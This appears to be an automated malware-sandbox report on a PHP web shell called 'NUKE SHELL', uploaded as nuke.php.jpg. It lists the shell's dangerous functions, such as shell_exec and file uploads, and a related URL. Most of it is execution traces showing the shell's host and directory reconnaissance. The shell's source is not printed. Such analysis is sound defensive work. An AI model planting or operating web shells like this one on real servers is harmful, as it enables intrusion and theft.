nuke.php, nuke.php.jpg

md5: 769abecc544ffed38f1d86805250f1a9

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Original, Traces)
getcwd (Original, Traces)
php_uname (Original, Traces)
phpinfo (Original)
set_time_limit (Original, Traces)

Execution
shell_exec (Original)

Files
copy (Original)
file_get_contents (Original)
move_uploaded_file (Original)

Input
_FILES (Original)
_GET (Original)
_POST (Original)

Title
NUKE SHELL (HTML, Original)

URLs
http://::1 (HTML)
http://imhatimi.org (HTML, Original)
https://imhatimi.org/forum/data/assets/logo/imtlogo3gf.gif.pagespeed.ce.sySeUzvzis.gif (Original)

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
data/traces/769abecc544ffed38f1d86805250f1a9_trace-1676241490.0904.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:38:35.988215]
1	0	1	0.000151	393528
1	3	0	0.000541	467112	{main}	1		/var/www/html/uploads/nuke.php.jpg	0	0
2	4	0	0.000562	467112	php_uname	0		/var/www/html/uploads/nuke.php.jpg	2	0
2	4	1	0.000577	467224
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/nuke.php.jpg	3	$dizin = 'localhost'
1		A						/var/www/html/uploads/nuke.php.jpg	5	$dizin = '127.0.0.1'
1		A						/var/www/html/uploads/nuke.php.jpg	5	$dizin = '127.0.0.1'
1		A						/var/www/html/uploads/nuke.php.jpg	6	$dizin = '127.0.0.1'
1		A						/var/www/html/uploads/nuke.php.jpg	6	$dizin = '127.0.0.1'
2	5	0	0.000650	467112	set_time_limit	0		/var/www/html/uploads/nuke.php.jpg	121	1	0
2	5	1	0.000666	467176
2	5	R			FALSE
2	6	0	0.000680	467144	error_reporting	0		/var/www/html/uploads/nuke.php.jpg	122	1	0
2	6	1	0.000692	467184
2	6	R			22527
2	7	0	0.000705	467144	get_magic_quotes_gpc	0		/var/www/html/uploads/nuke.php.jpg	124	0
2	7	1	0.000717	467144
2	7	R			FALSE
2	8	0	0.000730	467144	getcwd	0		/var/www/html/uploads/nuke.php.jpg	185	0
2	8	1	0.000743	467192
2	8	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/nuke.php.jpg	185	$path = '/var/www/html/uploads'
2	9	0	0.000769	467192	str_replace	0		/var/www/html/uploads/nuke.php.jpg	187	3	'\\'	'/'	'/var/www/html/uploads'
2	9	1	0.000785	467288
2	9	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/nuke.php.jpg	187	$path = '/var/www/html/uploads'
2	10	0	0.000808	467192	explode	0		/var/www/html/uploads/nuke.php.jpg	188	2	'/'	'/var/www/html/uploads'
2	10	1	0.000822	467768
2	10	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/nuke.php.jpg	188	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/nuke.php.jpg	190	$id = 0
1		A						/var/www/html/uploads/nuke.php.jpg	192	$a = TRUE
1		A						/var/www/html/uploads/nuke.php.jpg	190	$id = 1
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i = 0
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	190	$id = 2
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i = 0
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	190	$id = 3
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i = 0
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	190	$id = 4
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i = 0
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
1		A						/var/www/html/uploads/nuke.php.jpg	198	$i++
2	11	0	0.001061	467696	scandir	0		/var/www/html/uploads/nuke.php.jpg	289	1	'/var/www/html/uploads'
2	11	1	0.001096	468320
2	11	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'nuke.php.jpg', 5 => 'prepend.php']
1		A						/var/www/html/uploads/nuke.php.jpg	289	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'nuke.php.jpg', 5 => 'prepend.php']
2	12	0	0.001135	468336	is_dir	0		/var/www/html/uploads/nuke.php.jpg	299	1	'/var/www/html/uploads/.'
2	12	1	0.001152	468400
2	12	R			TRUE
2	13	0	0.001165	468368	is_dir	0		/var/www/html/uploads/nuke.php.jpg	299	1	'/var/www/html/uploads/..'
2	13	1	0.001181	468416
2	13	R			TRUE
2	14	0	0.001194	468376	is_dir	0		/var/www/html/uploads/nuke.php.jpg	299	1	'/var/www/html/uploads/.htaccess'
2	14	1	0.001209	468416
2	14	R			FALSE
2	15	0	0.001222	468376	is_dir	0		/var/www/html/uploads/nuke.php.jpg	299	1	'/var/www/html/uploads/data'
2	15	1	0.001236	468416
2	15	R			TRUE
2	16	0	0.001250	468376	is_writable	0		/var/www/html/uploads/nuke.php.jpg	304	1	'/var/www/html/uploads/data'
2	16	1	0.001274	468416
2	16	R			TRUE
2	17	0	0.001288	468376	perms	1		/var/www/html/uploads/nuke.php.jpg	306	1	'/var/www/html/uploads/data'
3	18	0	0.001301	468376	fileperms	0		/var/www/html/uploads/nuke.php.jpg	366	1	'/var/www/html/uploads/data'
3	18	1	0.001313	468416
3	18	R			16895
2		A						/var/www/html/uploads/nuke.php.jpg	366	$perms = 16895
2		A						/var/www/html/uploads/nuke.php.jpg	382	$info = 'd'
2		A						/var/www/html/uploads/nuke.php.jpg	395	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	396	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php.jpg	399	$info .= 'x'
2		A						/var/www/html/uploads/nuke.php.jpg	402	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	403	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php.jpg	406	$info .= 'x'
2		A						/var/www/html/uploads/nuke.php.jpg	409	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	410	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php.jpg	413	$info .= 'x'
2	17	1	0.001444	468416
2	17	R			'drwxrwxrwx'
2	19	0	0.001458	468376	is_writable	0		/var/www/html/uploads/nuke.php.jpg	307	1	'/var/www/html/uploads/data'
2	19	1	0.001474	468416
2	19	R			TRUE
2	20	0	0.001488	468384	is_dir	0		/var/www/html/uploads/nuke.php.jpg	299	1	'/var/www/html/uploads/nuke.php.jpg'
2	20	1	0.001502	468432
2	20	R			FALSE
2	21	0	0.001515	468392	is_dir	0		/var/www/html/uploads/nuke.php.jpg	299	1	'/var/www/html/uploads/prepend.php'
2	21	1	0.001530	468432
2	21	R			FALSE
2	22	0	0.001543	468376	is_file	0		/var/www/html/uploads/nuke.php.jpg	326	1	'/var/www/html/uploads/.'
2	22	1	0.001558	468400
2	22	R			FALSE
2	23	0	0.001570	468368	is_file	0		/var/www/html/uploads/nuke.php.jpg	326	1	'/var/www/html/uploads/..'
2	23	1	0.001585	468416
2	23	R			FALSE
2	24	0	0.001597	468376	is_file	0		/var/www/html/uploads/nuke.php.jpg	326	1	'/var/www/html/uploads/.htaccess'
2	24	1	0.001612	468416
2	24	R			TRUE
2	25	0	0.001624	468376	filesize	0		/var/www/html/uploads/nuke.php.jpg	327	1	'/var/www/html/uploads/.htaccess'
2	25	1	0.001637	468416
2	25	R			64
1		A						/var/www/html/uploads/nuke.php.jpg	327	$size = 0.0625
2	26	0	0.001661	468320	round	0		/var/www/html/uploads/nuke.php.jpg	328	2	0.0625	3
2	26	1	0.001676	468392
2	26	R			0.063
1		A						/var/www/html/uploads/nuke.php.jpg	328	$size = 0.063
1		A						/var/www/html/uploads/nuke.php.jpg	332	$size = '0.063 KB'
2	27	0	0.001713	468416	is_writable	0		/var/www/html/uploads/nuke.php.jpg	339	1	'/var/www/html/uploads/.htaccess'
2	27	1	0.001730	468456
2	27	R			FALSE
2	28	0	0.001743	468416	is_readable	0		/var/www/html/uploads/nuke.php.jpg	340	1	'/var/www/html/uploads/.htaccess'
2	28	1	0.001758	468456
2	28	R			TRUE
2	29	0	0.001771	468416	perms	1		/var/www/html/uploads/nuke.php.jpg	341	1	'/var/www/html/uploads/.htaccess'
3	30	0	0.001784	468416	fileperms	0		/var/www/html/uploads/nuke.php.jpg	366	1	'/var/www/html/uploads/.htaccess'
3	30	1	0.001797	468456
3	30	R			33188
2		A						/var/www/html/uploads/nuke.php.jpg	366	$perms = 33188
2		A						/var/www/html/uploads/nuke.php.jpg	376	$info = '-'
2		A						/var/www/html/uploads/nuke.php.jpg	395	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	396	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php.jpg	399	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	402	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	403	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	406	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	409	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	410	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	413	$info .= '-'
2	29	1	0.001914	468456
2	29	R			'-rw-r--r--'
2	31	0	0.001928	468416	is_writable	0		/var/www/html/uploads/nuke.php.jpg	342	1	'/var/www/html/uploads/.htaccess'
2	31	1	0.001944	468456
2	31	R			FALSE
2	32	0	0.001957	468416	is_readable	0		/var/www/html/uploads/nuke.php.jpg	342	1	'/var/www/html/uploads/.htaccess'
2	32	1	0.001973	468456
2	32	R			TRUE
2	33	0	0.001987	468416	is_file	0		/var/www/html/uploads/nuke.php.jpg	326	1	'/var/www/html/uploads/data'
2	33	1	0.002003	468456
2	33	R			FALSE
2	34	0	0.002021	468424	is_file	0		/var/www/html/uploads/nuke.php.jpg	326	1	'/var/www/html/uploads/nuke.php.jpg'
2	34	1	0.002036	468472
2	34	R			TRUE
2	35	0	0.002049	468432	filesize	0		/var/www/html/uploads/nuke.php.jpg	327	1	'/var/www/html/uploads/nuke.php.jpg'
2	35	1	0.002062	468472
2	35	R			14195
1		A						/var/www/html/uploads/nuke.php.jpg	327	$size = 13.8623046875
2	36	0	0.002086	468328	round	0		/var/www/html/uploads/nuke.php.jpg	328	2	13.8623046875	3
2	36	1	0.002100	468400
2	36	R			13.862
1		A						/var/www/html/uploads/nuke.php.jpg	328	$size = 13.862
1		A						/var/www/html/uploads/nuke.php.jpg	332	$size = '13.862 KB'
2	37	0	0.002136	468432	is_writable	0		/var/www/html/uploads/nuke.php.jpg	339	1	'/var/www/html/uploads/nuke.php.jpg'
2	37	1	0.002151	468472
2	37	R			FALSE
2	38	0	0.002164	468432	is_readable	0		/var/www/html/uploads/nuke.php.jpg	340	1	'/var/www/html/uploads/nuke.php.jpg'
2	38	1	0.002179	468472
2	38	R			TRUE
2	39	0	0.002192	468432	perms	1		/var/www/html/uploads/nuke.php.jpg	341	1	'/var/www/html/uploads/nuke.php.jpg'
3	40	0	0.002204	468432	fileperms	0		/var/www/html/uploads/nuke.php.jpg	366	1	'/var/www/html/uploads/nuke.php.jpg'
3	40	1	0.002217	468472
3	40	R			33204
2		A						/var/www/html/uploads/nuke.php.jpg	366	$perms = 33204
2		A						/var/www/html/uploads/nuke.php.jpg	376	$info = '-'
2		A						/var/www/html/uploads/nuke.php.jpg	395	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	396	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php.jpg	399	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	402	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	403	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php.jpg	406	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	409	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	410	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	413	$info .= '-'
2	39	1	0.002333	468472
2	39	R			'-rw-rw-r--'
2	41	0	0.002347	468432	is_writable	0		/var/www/html/uploads/nuke.php.jpg	342	1	'/var/www/html/uploads/nuke.php.jpg'
2	41	1	0.002362	468472
2	41	R			FALSE
2	42	0	0.002375	468432	is_readable	0		/var/www/html/uploads/nuke.php.jpg	342	1	'/var/www/html/uploads/nuke.php.jpg'
2	42	1	0.002390	468472
2	42	R			TRUE
2	43	0	0.002417	468544	is_file	0		/var/www/html/uploads/nuke.php.jpg	326	1	'/var/www/html/uploads/prepend.php'
2	43	1	0.002434	468584
2	43	R			TRUE
2	44	0	0.002447	468544	filesize	0		/var/www/html/uploads/nuke.php.jpg	327	1	'/var/www/html/uploads/prepend.php'
2	44	1	0.002460	468584
2	44	R			57
1		A						/var/www/html/uploads/nuke.php.jpg	327	$size = 0.0556640625
2	45	0	0.002484	468440	round	0		/var/www/html/uploads/nuke.php.jpg	328	2	0.0556640625	3
2	45	1	0.002497	468512
2	45	R			0.056
1		A						/var/www/html/uploads/nuke.php.jpg	328	$size = 0.056
1		A						/var/www/html/uploads/nuke.php.jpg	332	$size = '0.056 KB'
2	46	0	0.002535	468544	is_writable	0		/var/www/html/uploads/nuke.php.jpg	339	1	'/var/www/html/uploads/prepend.php'
2	46	1	0.002551	468584
2	46	R			FALSE
2	47	0	0.002564	468544	is_readable	0		/var/www/html/uploads/nuke.php.jpg	340	1	'/var/www/html/uploads/prepend.php'
2	47	1	0.002579	468584
2	47	R			TRUE
2	48	0	0.002593	468544	perms	1		/var/www/html/uploads/nuke.php.jpg	341	1	'/var/www/html/uploads/prepend.php'
3	49	0	0.002606	468544	fileperms	0		/var/www/html/uploads/nuke.php.jpg	366	1	'/var/www/html/uploads/prepend.php'
3	49	1	0.002619	468584
3	49	R			33261
2		A						/var/www/html/uploads/nuke.php.jpg	366	$perms = 33261
2		A						/var/www/html/uploads/nuke.php.jpg	376	$info = '-'
2		A						/var/www/html/uploads/nuke.php.jpg	395	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	396	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php.jpg	399	$info .= 'x'
2		A						/var/www/html/uploads/nuke.php.jpg	402	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	403	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	406	$info .= 'x'
2		A						/var/www/html/uploads/nuke.php.jpg	409	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php.jpg	410	$info .= '-'
2		A						/var/www/html/uploads/nuke.php.jpg	413	$info .= 'x'
2	48	1	0.002738	468584
2	48	R			'-rwxr-xr-x'
2	50	0	0.002752	468544	is_writable	0		/var/www/html/uploads/nuke.php.jpg	342	1	'/var/www/html/uploads/prepend.php'
2	50	1	0.002772	468584
2	50	R			FALSE
2	51	0	0.002786	468544	is_readable	0		/var/www/html/uploads/nuke.php.jpg	342	1	'/var/www/html/uploads/prepend.php'
2	51	1	0.002801	468584
2	51	R			TRUE
2	52	0	0.002815	468480	php_uname	0		/var/www/html/uploads/nuke.php.jpg	419	0
2	52	1	0.002829	468592
2	52	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	53	0	0.002848	468480	phpversion	0		/var/www/html/uploads/nuke.php.jpg	420	0
2	53	1	0.002860	468544
2	53	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
1	3	1	0.002877	468480
			0.002927	326240
TRACE END   [2023-02-12 20:38:35.991020]

data/traces/769abecc544ffed38f1d86805250f1a9_trace-1676262570.1983.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:29:56.096157]
1	0	1	0.000218	393512
1	3	0	0.000627	467088	{main}	1		/var/www/html/uploads/nuke.php	0	0
2	4	0	0.000647	467088	php_uname	0		/var/www/html/uploads/nuke.php	2	0
2	4	1	0.000662	467200
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/nuke.php	3	$dizin = 'localhost'
1		A						/var/www/html/uploads/nuke.php	5	$dizin = '127.0.0.1'
1		A						/var/www/html/uploads/nuke.php	5	$dizin = '127.0.0.1'
1		A						/var/www/html/uploads/nuke.php	6	$dizin = '127.0.0.1'
1		A						/var/www/html/uploads/nuke.php	6	$dizin = '127.0.0.1'
2	5	0	0.000736	467088	set_time_limit	0		/var/www/html/uploads/nuke.php	121	1	0
2	5	1	0.000752	467152
2	5	R			FALSE
2	6	0	0.000765	467120	error_reporting	0		/var/www/html/uploads/nuke.php	122	1	0
2	6	1	0.000778	467160
2	6	R			22527
2	7	0	0.000791	467120	get_magic_quotes_gpc	0		/var/www/html/uploads/nuke.php	124	0
2	7	1	0.000803	467120
2	7	R			FALSE
2	8	0	0.000816	467120	getcwd	0		/var/www/html/uploads/nuke.php	185	0
2	8	1	0.000829	467168
2	8	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/nuke.php	185	$path = '/var/www/html/uploads'
2	9	0	0.000854	467168	str_replace	0		/var/www/html/uploads/nuke.php	187	3	'\\'	'/'	'/var/www/html/uploads'
2	9	1	0.000870	467264
2	9	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/nuke.php	187	$path = '/var/www/html/uploads'
2	10	0	0.000894	467168	explode	0		/var/www/html/uploads/nuke.php	188	2	'/'	'/var/www/html/uploads'
2	10	1	0.000908	467744
2	10	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/nuke.php	188	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/nuke.php	190	$id = 0
1		A						/var/www/html/uploads/nuke.php	192	$a = TRUE
1		A						/var/www/html/uploads/nuke.php	190	$id = 1
1		A						/var/www/html/uploads/nuke.php	198	$i = 0
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	190	$id = 2
1		A						/var/www/html/uploads/nuke.php	198	$i = 0
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	190	$id = 3
1		A						/var/www/html/uploads/nuke.php	198	$i = 0
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	190	$id = 4
1		A						/var/www/html/uploads/nuke.php	198	$i = 0
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
1		A						/var/www/html/uploads/nuke.php	198	$i++
2	11	0	0.001149	467672	scandir	0		/var/www/html/uploads/nuke.php	289	1	'/var/www/html/uploads'
2	11	1	0.001185	468296
2	11	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'nuke.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/nuke.php	289	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'nuke.php', 5 => 'prepend.php']
2	12	0	0.001224	468312	is_dir	0		/var/www/html/uploads/nuke.php	299	1	'/var/www/html/uploads/.'
2	12	1	0.001240	468376
2	12	R			TRUE
2	13	0	0.001254	468344	is_dir	0		/var/www/html/uploads/nuke.php	299	1	'/var/www/html/uploads/..'
2	13	1	0.001269	468392
2	13	R			TRUE
2	14	0	0.001282	468352	is_dir	0		/var/www/html/uploads/nuke.php	299	1	'/var/www/html/uploads/.htaccess'
2	14	1	0.001297	468392
2	14	R			FALSE
2	15	0	0.001310	468352	is_dir	0		/var/www/html/uploads/nuke.php	299	1	'/var/www/html/uploads/data'
2	15	1	0.001324	468392
2	15	R			TRUE
2	16	0	0.001339	468352	is_writable	0		/var/www/html/uploads/nuke.php	304	1	'/var/www/html/uploads/data'
2	16	1	0.001357	468392
2	16	R			TRUE
2	17	0	0.001371	468352	perms	1		/var/www/html/uploads/nuke.php	306	1	'/var/www/html/uploads/data'
3	18	0	0.001390	468352	fileperms	0		/var/www/html/uploads/nuke.php	366	1	'/var/www/html/uploads/data'
3	18	1	0.001404	468392
3	18	R			16895
2		A						/var/www/html/uploads/nuke.php	366	$perms = 16895
2		A						/var/www/html/uploads/nuke.php	382	$info = 'd'
2		A						/var/www/html/uploads/nuke.php	395	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	396	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php	399	$info .= 'x'
2		A						/var/www/html/uploads/nuke.php	402	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	403	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php	406	$info .= 'x'
2		A						/var/www/html/uploads/nuke.php	409	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	410	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php	413	$info .= 'x'
2	17	1	0.001525	468392
2	17	R			'drwxrwxrwx'
2	19	0	0.001539	468352	is_writable	0		/var/www/html/uploads/nuke.php	307	1	'/var/www/html/uploads/data'
2	19	1	0.001555	468392
2	19	R			TRUE
2	20	0	0.001569	468352	is_dir	0		/var/www/html/uploads/nuke.php	299	1	'/var/www/html/uploads/nuke.php'
2	20	1	0.001583	468392
2	20	R			FALSE
2	21	0	0.001596	468360	is_dir	0		/var/www/html/uploads/nuke.php	299	1	'/var/www/html/uploads/prepend.php'
2	21	1	0.001611	468408
2	21	R			FALSE
2	22	0	0.001624	468352	is_file	0		/var/www/html/uploads/nuke.php	326	1	'/var/www/html/uploads/.'
2	22	1	0.001639	468376
2	22	R			FALSE
2	23	0	0.001652	468344	is_file	0		/var/www/html/uploads/nuke.php	326	1	'/var/www/html/uploads/..'
2	23	1	0.001665	468392
2	23	R			FALSE
2	24	0	0.001678	468352	is_file	0		/var/www/html/uploads/nuke.php	326	1	'/var/www/html/uploads/.htaccess'
2	24	1	0.001692	468392
2	24	R			TRUE
2	25	0	0.001705	468352	filesize	0		/var/www/html/uploads/nuke.php	327	1	'/var/www/html/uploads/.htaccess'
2	25	1	0.001718	468392
2	25	R			64
1		A						/var/www/html/uploads/nuke.php	327	$size = 0.0625
2	26	0	0.001741	468296	round	0		/var/www/html/uploads/nuke.php	328	2	0.0625	3
2	26	1	0.001754	468368
2	26	R			0.063
1		A						/var/www/html/uploads/nuke.php	328	$size = 0.063
1		A						/var/www/html/uploads/nuke.php	332	$size = '0.063 KB'
2	27	0	0.001791	468392	is_writable	0		/var/www/html/uploads/nuke.php	339	1	'/var/www/html/uploads/.htaccess'
2	27	1	0.001806	468432
2	27	R			FALSE
2	28	0	0.001819	468392	is_readable	0		/var/www/html/uploads/nuke.php	340	1	'/var/www/html/uploads/.htaccess'
2	28	1	0.001834	468432
2	28	R			TRUE
2	29	0	0.001846	468392	perms	1		/var/www/html/uploads/nuke.php	341	1	'/var/www/html/uploads/.htaccess'
3	30	0	0.001859	468392	fileperms	0		/var/www/html/uploads/nuke.php	366	1	'/var/www/html/uploads/.htaccess'
3	30	1	0.001873	468432
3	30	R			33188
2		A						/var/www/html/uploads/nuke.php	366	$perms = 33188
2		A						/var/www/html/uploads/nuke.php	376	$info = '-'
2		A						/var/www/html/uploads/nuke.php	395	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	396	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php	399	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	402	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	403	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	406	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	409	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	410	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	413	$info .= '-'
2	29	1	0.001990	468432
2	29	R			'-rw-r--r--'
2	31	0	0.002003	468392	is_writable	0		/var/www/html/uploads/nuke.php	342	1	'/var/www/html/uploads/.htaccess'
2	31	1	0.002019	468432
2	31	R			FALSE
2	32	0	0.002031	468392	is_readable	0		/var/www/html/uploads/nuke.php	342	1	'/var/www/html/uploads/.htaccess'
2	32	1	0.002046	468432
2	32	R			TRUE
2	33	0	0.002059	468392	is_file	0		/var/www/html/uploads/nuke.php	326	1	'/var/www/html/uploads/data'
2	33	1	0.002073	468432
2	33	R			FALSE
2	34	0	0.002086	468392	is_file	0		/var/www/html/uploads/nuke.php	326	1	'/var/www/html/uploads/nuke.php'
2	34	1	0.002100	468432
2	34	R			TRUE
2	35	0	0.002113	468392	filesize	0		/var/www/html/uploads/nuke.php	327	1	'/var/www/html/uploads/nuke.php'
2	35	1	0.002125	468432
2	35	R			14195
1		A						/var/www/html/uploads/nuke.php	327	$size = 13.8623046875
2	36	0	0.002153	468296	round	0		/var/www/html/uploads/nuke.php	328	2	13.8623046875	3
2	36	1	0.002167	468368
2	36	R			13.862
1		A						/var/www/html/uploads/nuke.php	328	$size = 13.862
1		A						/var/www/html/uploads/nuke.php	332	$size = '13.862 KB'
2	37	0	0.002202	468392	is_writable	0		/var/www/html/uploads/nuke.php	339	1	'/var/www/html/uploads/nuke.php'
2	37	1	0.002217	468432
2	37	R			FALSE
2	38	0	0.002230	468392	is_readable	0		/var/www/html/uploads/nuke.php	340	1	'/var/www/html/uploads/nuke.php'
2	38	1	0.002244	468432
2	38	R			TRUE
2	39	0	0.002257	468392	perms	1		/var/www/html/uploads/nuke.php	341	1	'/var/www/html/uploads/nuke.php'
3	40	0	0.002268	468392	fileperms	0		/var/www/html/uploads/nuke.php	366	1	'/var/www/html/uploads/nuke.php'
3	40	1	0.002280	468432
3	40	R			33204
2		A						/var/www/html/uploads/nuke.php	366	$perms = 33204
2		A						/var/www/html/uploads/nuke.php	376	$info = '-'
2		A						/var/www/html/uploads/nuke.php	395	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	396	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php	399	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	402	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	403	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php	406	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	409	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	410	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	413	$info .= '-'
2	39	1	0.002397	468432
2	39	R			'-rw-rw-r--'
2	41	0	0.002411	468392	is_writable	0		/var/www/html/uploads/nuke.php	342	1	'/var/www/html/uploads/nuke.php'
2	41	1	0.002426	468432
2	41	R			FALSE
2	42	0	0.002439	468392	is_readable	0		/var/www/html/uploads/nuke.php	342	1	'/var/www/html/uploads/nuke.php'
2	42	1	0.002453	468432
2	42	R			TRUE
2	43	0	0.002471	468512	is_file	0		/var/www/html/uploads/nuke.php	326	1	'/var/www/html/uploads/prepend.php'
2	43	1	0.002486	468560
2	43	R			TRUE
2	44	0	0.002499	468520	filesize	0		/var/www/html/uploads/nuke.php	327	1	'/var/www/html/uploads/prepend.php'
2	44	1	0.002512	468560
2	44	R			57
1		A						/var/www/html/uploads/nuke.php	327	$size = 0.0556640625
2	45	0	0.002535	468416	round	0		/var/www/html/uploads/nuke.php	328	2	0.0556640625	3
2	45	1	0.002548	468488
2	45	R			0.056
1		A						/var/www/html/uploads/nuke.php	328	$size = 0.056
1		A						/var/www/html/uploads/nuke.php	332	$size = '0.056 KB'
2	46	0	0.002583	468520	is_writable	0		/var/www/html/uploads/nuke.php	339	1	'/var/www/html/uploads/prepend.php'
2	46	1	0.002599	468560
2	46	R			FALSE
2	47	0	0.002612	468520	is_readable	0		/var/www/html/uploads/nuke.php	340	1	'/var/www/html/uploads/prepend.php'
2	47	1	0.002627	468560
2	47	R			TRUE
2	48	0	0.002639	468520	perms	1		/var/www/html/uploads/nuke.php	341	1	'/var/www/html/uploads/prepend.php'
3	49	0	0.002653	468520	fileperms	0		/var/www/html/uploads/nuke.php	366	1	'/var/www/html/uploads/prepend.php'
3	49	1	0.002667	468560
3	49	R			33261
2		A						/var/www/html/uploads/nuke.php	366	$perms = 33261
2		A						/var/www/html/uploads/nuke.php	376	$info = '-'
2		A						/var/www/html/uploads/nuke.php	395	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	396	$info .= 'w'
2		A						/var/www/html/uploads/nuke.php	399	$info .= 'x'
2		A						/var/www/html/uploads/nuke.php	402	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	403	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	406	$info .= 'x'
